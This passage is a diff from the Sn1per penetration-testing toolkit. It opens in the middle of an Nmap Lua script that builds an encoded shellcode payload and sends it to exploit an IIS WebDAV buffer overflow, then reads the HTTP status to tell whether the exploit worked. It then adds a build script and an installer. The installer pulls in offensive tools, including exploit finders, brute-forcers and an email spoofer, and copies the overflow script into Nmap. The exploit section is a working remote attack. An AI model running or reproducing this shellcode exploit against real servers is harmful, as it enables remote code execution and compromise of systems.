+  payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
+  payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
+
+  -- Shellcode
+  shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
+  shellcode = shellcode .. 'BAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V'
+  shellcode = shellcode .. '3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O0'
+  shellcode = shellcode .. '2LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ'
+  shellcode = shellcode .. '2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1'
+  shellcode = shellcode .. 'KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
+
+  payload = payload .. shellcode
+  payload = payload .. '>\r\n\r\n'
+
+  -- Exploiting the vulnerability
+  try(socket:send(payload))
+
+  -- We receive a 200 response if the payload succeeds.
+  response = try(socket:receive_bytes(80960))
+  socket:close()
+
+  -- Checking for 200 response in the response
+  local regex = "HTTP/1.1 (%d+)"
+  local status = string.match(response, regex)
+
+  if status == '200' then
+    -- Buffer overflow is successfully executed on the server.
+    vuln.state = vulns.STATE.EXPLOIT
+    vuln.exploit_results = response
+  elseif status == '400' then
+    -- Bad request error is occured because webdav is not installed.
+    vuln.state = vulns.STATE.LIKELY_VULN
+    vuln.exploit_results = "Server returned 400: Install webdav and try again."
+  elseif status == '502' then
+    -- Likely to have an error in the Server Name
+    vuln.state = vulns.STATE.LIKELY_VULN
+    vuln.exploit_results = "Server returned 502: Please try to change ServerName and run the exploit again"
+  elseif status ~= nil then
+    vuln.exploit_results = response
+  end
+
+  return vuln_report:make_output(vuln)
+
+end
+

build.sh

@@ -0,0 +1,5 @@
+#!/bin/bash
+# build script to push to github... 
+git add *
+git commit -m 'Sn1per by 1N3CrowdShield'
+git push origin master

install.sh

@@ -18,51 +18,78 @@ echo -e "$RESET"
 echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 echo ""
 
-DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
+INSTALL_DIR=/usr/share/sniper
+LOOT_DIR=/usr/share/sniper/loot
+PLUGINS_DIR=/usr/share/sniper/plugins
 
-echo -e "$OKGREEN + -- --=[This script will install or upgrade your Sn1per installation. Are you sure you want to continue?$RESET"
-read answer
+echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
+read answer 
+
+mkdir -p $INSTALL_DIR 2> /dev/null
+mkdir -p $LOOT_DIR 2> /dev/null
+mkdir $LOOT_DIR/domains 2> /dev/null
+mkdir $LOOT_DIR/screenshots 2> /dev/null
+mkdir $LOOT_DIR/nmap 2> /dev/null
+mkdir $LOOT_DIR/reports 2> /dev/null
+mkdir $LOOT_DIR/output 2> /dev/null
+cp -Rf $PWD/* $INSTALL_DIR 
+cd $INSTALL_DIR
 
 echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
-apt-get install dos2unix zenmap sslyze joomscan uniscan xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap
-pip install dnspython colorama tldextract
+apt-get install ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
+pip install dnspython colorama tldextract urllib3 ipaddress
 
 echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
 gem install rake
 gem install ruby-nmap net-http-persistent mechanize text-table
 
 echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
-rm -Rf Findsploit/ Brutex/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ CrackMapExec/
+rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
+mkdir $PLUGINS_DIR
+cd $PLUGINS_DIR
+mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
 
 echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
-git clone https://github.com/1N3/Findsploit.git
-git clone https://github.com/1N3/BruteX.git
-git clone https://github.com/1N3/Goohak.git
-git clone https://github.com/1N3/XSSTracer.git
-git clone https://github.com/1N3/MassBleed.git
-git clone https://github.com/1N3/SuperMicro-Password-Scanner
-git clone https://github.com/Dionach/CMSmap.git
-git clone https://github.com/0xsauby/yasuo.git
-git clone https://github.com/johndekroon/serializekiller.git
-git clone https://github.com/aboul3la/Sublist3r.git
-git clone https://github.com/nccgroup/shocker.git
-git clone https://github.com/joaomatosf/jexboss.git
-git clone https://github.com/byt3bl33d3r/CrackMapExec.git
-git clone https://github.com/drwetter/testssl.sh.git
-git clone https://github.com/lunarca/SimpleEmailSpoofer
-
+git clone https://github.com/1N3/Findsploit.git 
+git clone https://github.com/1N3/BruteX.git 
+git clone https://github.com/1N3/Goohak.git 
+git clone https://github.com/1N3/XSSTracer.git 
+git clone https://github.com/1N3/MassBleed.git 
+git clone https://github.com/1N3/SuperMicro-Password-Scanner 
+git clone https://github.com/Dionach/CMSmap.git 
+git clone https://github.com/0xsauby/yasuo.git 
+git clone https://github.com/johndekroon/serializekiller.git 
+git clone https://github.com/aboul3la/Sublist3r.git 
+git clone https://github.com/nccgroup/shocker.git 
+git clone --depth 1 https://github.com/drwetter/testssl.sh.git 
+git clone https://github.com/lunarca/SimpleEmailSpoofer 
+git clone https://github.com/arthepsy/ssh-audit 
+git clone https://github.com/m0rtem/CloudFail.git
+wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
+wget https://raw.githubusercontent.com/xorrbit/nmap/865142904566e416944ebd6870d496c730934965/scripts/http-vuln-INTEL-SA-00075.nse -O /usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse
+cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse
 echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
-mkdir loot 2> /dev/null
-cp -f $DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
-chmod +x $DIR/sniper
-chmod +x $DIR/bin/dnsdict6
-chmod +x $DIR/Goohak/goohak
-chmod +x $DIR/XSSTracer/xsstracer.py
-chmod +x $DIR/MassBleed/massbleed
-chmod +x $DIR/MassBleed/heartbleed.py
-chmod +x $DIR/MassBleed/openssl_ccs.pl
-chmod +x $DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
-chmod +x $DIR/testssl.sh/testssl.sh
+cd $PLUGINS_DIR/CloudFail/ && apt-get install python3-pip && pip3 install -r requirements.txt
+cd $PLUGINS_DIR/Findsploit/ && bash install.sh
+cd $PLUGINS_DIR/BruteX/ && bash install.sh
+cd $INSTALL_DIR 
+mkdir $LOOT_DIR 2> /dev/null
+mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
+mkdir $LOOT_DIR/nmap -p 2> /dev/null
+mkdir $LOOT_DIR/domains -p 2> /dev/null
+mkdir $LOOT_DIR/output -p 2> /dev/null
+mkdir $LOOT_DIR/reports -p 2> /dev/null
+cp -f $INSTALL_DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
+chmod +x $INSTALL_DIR/sniper
+chmod +x $INSTALL_DIR/bin/dnsdict6
+chmod +x $PLUGINS_DIR/Goohak/goohak
+chmod +x $PLUGINS_DIR/XSSTracer/xsstracer.py
+chmod +x $PLUGINS_DIR/MassBleed/massbleed
+chmod +x $PLUGINS_DIR/MassBleed/heartbleed.py
+chmod +x $PLUGINS_DIR/MassBleed/openssl_ccs.pl
+chmod +x $PLUGINS_DIR/MassBleed/winshock.sh 
+chmod +x $PLUGINS_DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
+chmod +x $PLUGINS_DIR/testssl.sh/testssl.sh
 rm -f /usr/bin/sniper
 rm -f /usr/bin/goohak
 rm -f /usr/bin/xsstracer
@@ -70,18 +97,14 @@ rm -f /usr/bin/findsploit
 rm -f /usr/bin/copysploit
 rm -f /usr/bin/compilesploit
 rm -f /usr/bin/massbleed
-rm -f /usr/bin/brutex
-ln -s $DIR/sniper /usr/bin/sniper
-ln -s $DIR/Goohak/goohak /usr/bin/goohak
-ln -s $DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
-ln -s $DIR/Findsploit/findsploit /usr/bin/findsploit
-ln -s $DIR/Findsploit/copysploit /usr/bin/copysploit
-ln -s $DIR/Findsploit/compilesploit /usr/bin/compilesploit
-ln -s $DIR/MassBleed/massbleed /usr/bin/massbleed
-ln -s $DIR/BruteX/brutex /usr/bin/brutex
-ln -s $DIR/testssl.sh/testssl.sh /usr/bin/testssl
-
-echo -e "$OKORANGE + -- --=[For universal sniper access, be sure to edit sniper to include the full path for the SNIPER_DIR variable. $RESET"
+rm -f /usr/bin/testssl
+ln -s $INSTALL_DIR/sniper /usr/bin/sniper
+ln -s $PLUGINS_DIR/Goohak/goohak /usr/bin/goohak
+ln -s $PLUGINS_DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
+ln -s $PLUGINS_DIR/Findsploit/findsploit /usr/bin/findsploit
+ln -s $PLUGINS_DIR/Findsploit/copysploit /usr/bin/copysploit
+ln -s $PLUGINS_DIR/Findsploit/compilesploit /usr/bin/compilesploit
+ln -s $PLUGINS_DIR/MassBleed/massbleed /usr/bin/massbleed
+ln -s $PLUGINS_DIR/testssl.sh/testssl.sh /usr/bin/testssl
 echo -e "$OKORANGE + -- --=[Done!$RESET"
-
-
+echo -e "$OKORANGE + -- --=[To run, type 'sniper'! $RESET"